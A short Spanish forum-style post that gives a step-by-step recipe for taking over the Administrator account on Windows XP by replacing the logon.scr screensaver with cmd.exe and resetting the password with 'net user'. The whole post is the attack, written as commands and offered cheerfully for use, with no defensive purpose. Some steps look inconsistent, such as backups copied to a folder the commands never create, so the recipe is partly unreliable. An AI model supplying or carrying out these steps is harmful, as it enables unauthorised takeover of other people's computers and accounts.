Esta vulnerabilidad permite cambiar la password del usuario Administrador de Windows XP con los privilegios mínimos.

Según se describe, los pasos para obtener los privilegios de Administrador (root) en Windows XP (versión home y profesional) son:


Pararse en el root del directorio:
cd

ir al directorio system32:
cd \windows\system32


Hacer un backup del archivo logon.scr y cmd.exe
mkdir temphack
copy logon.scr c:\temphack\logon.scr
copy cmd.exe c:\temphack\cmd.exe

Borrar el archivo original logon.scr
del logon.scr


Reemplazar el archivo logon.scr por cmd.exe (esto habilita un prompt de DOS en lugar del screen para seleccionar el usuario.)
rename cmd.exe logon.scr
exit

Luego de esto reiniciar la máquina y notará que tendrá acceso a un prompt de DOS.

Si la cuenta del Administrador se llama Pepe y quieres cambiarle la contraseña:
net user pepe clave (donde "clave" es la nueva contraseña)

Ahora puede loguearse como Administrador con la nueva contraseña.

Esta vulnerabilidad sólo funciona teniendo acceso físico y a la maquina y una cuenta de usuario. Se han reportado casos en donde esta vulnerabilidad no funciona, posiblemente dependio de los parches instalados en el sistema.

Espero que os sirva de mucho... jajjajajaja